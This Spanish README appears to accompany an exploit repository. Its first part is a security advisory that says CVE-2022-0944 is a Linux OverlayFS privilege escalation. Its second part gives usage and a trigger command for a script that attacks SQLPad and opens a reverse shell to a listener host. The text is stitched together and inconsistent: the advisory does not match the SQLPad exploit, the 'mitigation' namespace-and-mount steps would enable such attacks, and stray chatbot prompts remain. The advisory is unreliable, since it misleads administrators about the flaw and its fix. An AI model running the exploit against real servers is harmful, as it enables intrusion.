
Aviso de seguridad y guía de mitigación para la vulnerabilidad de escalada de privilegios en OverlayFS del kernel de Linux.
CVE-2022-0944 es una vulnerabilidad de seguridad en el subsistema OverlayFS del kernel de Linux que permite a atacantes locales escalar privilegios mediante el manejo inadecuado de la creación de archivos en configuraciones específicas.

🚨 Impacto
Un atacante local podría:
Obtener privilegios de root mediante operaciones de archivos manipulados
Evadir las restricciones de seguridad
Modificar archivos sensibles del sistema
Comprometer la integridad de todo el sistema
🔍 Detección
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ Mitigación
Parches oficiales
Actualice a una de estas versiones parcheadas:
Kernel de Linux 5.16.12 o posterior
Parches backportados específicos del proveedor
Comando de actualización:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
Soluciones alternativas (si el parcheo no es inmediato)
Restringir el uso de OverlayFS:
sudo modprobe -r overlay
Implementar restricciones de espacios de nombres (namespaces):
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
Aplicar políticas de SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ Aviso legal Este documento se proporciona únicamente con fines informativos. Aunque se ha hecho todo lo posible por garantizar su precisión, no se ofrece ninguna garantía. Pruebe siempre los parches en un entorno de desarrollo antes de implementarlos en producción.
Última actualización: 2023-10-01 | Ver registro de cambios
Características principales:
Este formato de README es adecuado para:
¿Le gustaría que:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
Ejemplo:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Este repositorio contiene código y herramientas destinados exclusivamente a fines educativos, específicamente para su uso en cursos de ciberseguridad y entornos de aprendizaje. El autor de este código no asume ninguna responsabilidad por las consecuencias derivadas del uso, mal uso o modificación de este código. El código se proporciona "tal cual", sin ninguna garantía, expresa o implícita, incluidas, entre otras, las garantías implícitas de comerciabilidad o idoneidad para un propósito particular.